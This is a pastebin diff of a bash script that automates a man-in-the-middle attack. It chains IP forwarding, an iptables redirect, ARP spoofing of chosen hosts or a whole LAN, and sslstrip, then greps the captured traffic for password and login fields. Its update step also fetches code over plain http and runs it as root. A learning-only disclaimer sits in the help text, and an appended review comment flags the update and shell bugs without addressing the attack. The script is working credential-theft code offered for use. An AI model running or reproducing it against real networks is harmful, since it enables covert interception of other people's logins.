View difference between Paste ID: NM4T4H6b and
1 | - | |
1 | + | #!/bin/bash |
2 | # Little bash script to launch man it the middle attack and sslstrip. | |
3 | # version 0.6 by comaX | |
4 | PROGNAME=$(basename $0) | |
5 | VERSION="0.6.2" | |
6 | #Let's define some arguments that can be passed to the script : | |
7 | args= | |
8 | while [ $# -ge 1 ] #check parameters | |
9 | do | |
10 | case $1 in | |
11 | -h | --help) #define help message | |
12 | clear | |
13 | echo -e "You are running $0, version $VERSION. | |
14 | ||
15 | usage : $0 [-h | --help] | [-u | --upadte] | |
16 | -h or --help : displays this help message, disclaimer and exit. | |
17 | -u or --update updates and installs this script | |
18 | ||
19 | \033[31m DISCLAIMER :\033[m | |
20 | This program is intended for learning purpose only. I do not condone hacking | |
21 | and wouldn't be held responsible for you actions. Only you would face legal | |
22 | consequences if you used this script for illegal activities. | |
23 | ||
24 | \033[31m What I think should be learnt from this script :\033[m | |
25 | This script should teach you how easy it is to steal sensitive online | |
26 | credential and how to protect you from it, provided you understand | |
27 | what this program does. The best way to understand what it does is | |
28 | to look at its source. This will also teach you very basic shell script | |
29 | programming. | |
30 | ||
31 | \033[31m Changelog :\033[m | |
32 | added in v0.6 | |
33 | -Support for multiple targets | |
34 | ||
35 | added in v0.5 : | |
36 | -Parameters for this great help message and update, more comments. | |
37 | -Minor improvments | |
38 | ||
39 | added in v0.4 : | |
40 | -User friendly case insensitive answers (Y/y) | |
41 | -Option to map network, retrieving live hosts and their dns names | |
42 | -Minor improvments | |
43 | ||
44 | \033[31m Credits :\033[m | |
45 | Credits goes to all people on backtrack forums for their help and support, | |
46 | and google for being my best friend with scripting. | |
47 | ||
48 | Please criticize this program or submit ideas on the official thread at | |
49 | http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com" | |
50 | exit ;; | |
51 | -u | --update) #update program | |
52 | echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)" | |
53 | read -e proceed | |
54 | if [[ $proceed = "y" || $proceed = "Y" ]] ; then | |
55 | wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file | |
56 | cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin | |
57 | rm /tmp/mitm_update.sh #delete temp file | |
58 | echo -e "\033[32m Script updated ! Restarting to updated version...\033[m" | |
59 | sleep 3 | |
60 | chmod +x /usr/bin/mitm #make newly installed script executable | |
61 | /usr/bin/mitm #launch new script | |
62 | else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2 | |
63 | fi ;; | |
64 | *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;; | |
65 | esac | |
66 | shift | |
67 | done | |
68 | ||
69 | clear | |
70 | echo -e "=========================================================================== | |
71 | =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m = | |
72 | = Feel free to contribute, and distribute this script as you please. = | |
73 | = Official thread : http://tiny.cc/mitmautomate = | |
74 | = Check out the help (-h) to see new features and informations = | |
75 | = You are running version $VERSION. = | |
76 | ===========================================================================" | |
77 | echo | |
78 | echo | |
79 | # Starting fresh : reset ip forward and iptables | |
80 | echo -e "\033[31m [+] Cleaning iptables \033[m" | |
81 | echo "[-] Cleaned." | |
82 | echo "0" > /proc/sys/net/ipv4/ip_forward | |
83 | iptables --flush | |
84 | iptables --table nat --flush | |
85 | iptables --delete-chain | |
86 | iptables --table nat --delete-chain | |
87 | ||
88 | # Defining exit function and other ending features | |
89 | ||
90 | cleanup() { | |
91 | echo | |
92 | echo "[+] Killing processes and resetting iptable." | |
93 | ||
94 | kill ${sslstripid} | |
95 | killall arpspoof | |
96 | echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding | |
97 | iptables --flush # there are probably too many resets here, | |
98 | iptables --table nat --flush # but at least we're sure everything's clean | |
99 | iptables --delete-chain | |
100 | iptables --table nat --delete-chain | |
101 | ||
102 | echo "[+] Clean up successful..." | |
103 | echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results | |
104 | echo -e "\033[37m (Will be blank if no passwords were found) \033[m" | |
105 | egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found | |
106 | echo | |
107 | echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)" | |
108 | echo "If you want to keep it, it will be stored in /root/$filename.txt" | |
109 | read -e keep | |
110 | if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or" | |
111 | mv /tmp/$filename.txt /root/$filename.txt #moving file | |
112 | if [ -f "/root/$filename.txt" ]; then #check if it exists | |
113 | echo "Log file copied !" #it does | |
114 | else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not | |
115 | fi | |
116 | else rm /tmp/$filename.txt #removing temp file | |
117 | echo "All logs deleted" | |
118 | fi | |
119 | if [ -f "/usr/bin/mitm" ]; then #check if script is already installed | |
120 | echo | |
121 | echo | |
122 | exit 1 #if yes, exit. | |
123 | else | |
124 | echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask. | |
125 | read -e install | |
126 | if [[ $install = "Y" || $install="y" ]] ; then | |
127 | cp ./mitm.sh /usr/bin/mitm #copy and rename script | |
128 | echo -e "\033[32m Script installed !\033[m" | |
129 | else echo "Script not installed." | |
130 | fi | |
131 | fi | |
132 | ||
133 | exit | |
134 | } | |
135 | ###############################End of functions############################# | |
136 | # IP forwarding | |
137 | echo | |
138 | echo -e "\033[31m [+] Activating ip forwarding... \033[m" | |
139 | echo "1" > /proc/sys/net/ipv4/ip_forward | |
140 | echo "[-] Activated." | |
141 | ||
142 | #Iptables | |
143 | echo | |
144 | echo -e "\033[31m [+] Configuring iptables... \033[m" | |
145 | echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)" | |
146 | echo | |
147 | read -e outport | |
148 | echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)" | |
149 | echo | |
150 | read -e inport | |
151 | echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m" | |
152 | iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport | |
153 | echo "[-] Traffic rerouted" | |
154 | ||
155 | #Arpspoofing | |
156 | echo | |
157 | echo -e "\033[31m [+] Activating arpspoofing... \033[m" | |
158 | echo | |
159 | ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need. | |
160 | echo | |
161 | echo "Enter gateway ip adress (as shown above) :" | |
162 | read -e gateway | |
163 | echo | |
164 | echo "What interface would you like to use ? (it should match gateway ip as shown above)" | |
165 | read -e iface | |
166 | echo | |
167 | echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)" | |
168 | read -e choicearp | |
169 | echo | |
170 | ||
171 | if [[ $choicearp = "N" || $choicearp = "n" ]] ; then | |
172 | echo | |
173 | echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]" | |
174 | read -e hosts | |
175 | echo -e "\033[31m " | |
176 | if [[ $hosts = "Y" || $hosts = "y" ]] ; then | |
177 | fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up | |
178 | grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts) | |
179 | rm /tmp/hosts.txt # remove temporary file | |
180 | echo -e "\033[m " # switch color back to white | |
181 | else echo -e "\033[m " | |
182 | fi | |
183 | echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m " | |
184 | arpspoofi() { | |
185 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2 | |
186 | ||
187 | if [[ "$2" > "0" ]] ; then | |
188 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2 | |
189 | else echo | |
190 | fi | |
191 | if [[ "$3" > "0" ]] ; then | |
192 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2 | |
193 | else echo | |
194 | fi | |
195 | if [[ "$4" > "0" ]] ; then | |
196 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2 | |
197 | else echo | |
198 | fi | |
199 | if [[ "$5" > "0" ]] ; then | |
200 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2 | |
201 | else echo | |
202 | fi | |
203 | if [[ "$6" > "0" ]] ; then | |
204 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2 | |
205 | else echo | |
206 | fi | |
207 | t1=$1 | |
208 | t2=$2 | |
209 | t3=$3 | |
210 | t4=$4 | |
211 | t5=$5 | |
212 | t6=$6 | |
213 | ||
214 | } | |
215 | echo "Enter ip adresses" | |
216 | read -e parameters | |
217 | arpspoofi $parameters | |
218 | echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m" | |
219 | echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m" | |
220 | ||
221 | elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then | |
222 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$! | |
223 | sleep 2 | |
224 | echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m" | |
225 | echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m" | |
226 | ||
227 | else echo "Your choice is invalid. Quitting." | |
228 | cleanup | |
229 | fi | |
230 | ||
231 | ||
232 | #Sslstrip | |
233 | echo | |
234 | echo -e "\033[31m [+] Activating sslstrip... \033[m" | |
235 | echo "Choose filename to output :" | |
236 | read -e filename | |
237 | sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file | |
238 | sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines | |
239 | echo | |
240 | echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m" | |
241 | echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ? | |
242 | echo | |
243 | echo -e "\033[37m Attack should be running smooth, enjoy.\033[m" | |
244 | echo | |
245 | echo -e "\033[33m To stop the attack, input 'quit' below :\033[m" | |
246 | echo | |
247 | read quitting | |
248 | if [ $quitting = "quit" ] ; then | |
249 | ||
250 | cleanup | |
251 | else echo "Bad choice. Enter quit to stop attack" | |
252 | read -e quitting | |
253 | if [ $quitting = "quit" ] ; then | |
254 | cleanup | |
255 | ||
256 | else echo "Bad choice. Enter quit to stop attack" | |
257 | read -e quitting | |
258 | if [ $quitting = "quit" ] ; then | |
259 | cleanup | |
260 | ||
261 | else echo "Bad choice. Enter quit to stop attack" | |
262 | read -e quitting | |
263 | if [ $quitting = "quit" ] ; then | |
264 | cleanup | |
265 | ||
266 | else echo "Bad choice. Enter quit to stop attack" | |
267 | echo | |
268 | echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here | |
269 | cleanup | |
270 | fi | |
271 | fi | |
272 | fi | |
273 | fi |
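Review bot: The `--update` branch fetches the replacement script over plain `http://` into the fixed path `/tmp/mitm_update.sh`, copies it to `/usr/bin/mitm` and executes it with no integrity check. Anyone who can tamper with that connection or pre-create the temp file therefore controls code that presumably runs as root, since the script writes to `/proc/sys` and calls `iptables`. Download into a file created with `tmp=$(mktemp) || exit 1`, verify it against a digest obtained out of band with `sha256sum -c <published-digest-file>` (placeholder name), and abort before the `cp` on a mismatch. Separately, the install prompt in `cleanup` tests `$install="y"` with no spaces around `=`, which is a single non-empty word and always true; it should read `$install = "y"`. The unconditional `iptables --flush` at startup and in `cleanup` also discards whatever firewall rules the host already had, so saving them with `iptables-save` and restoring with `iptables-restore` would leave the machine filtered as before.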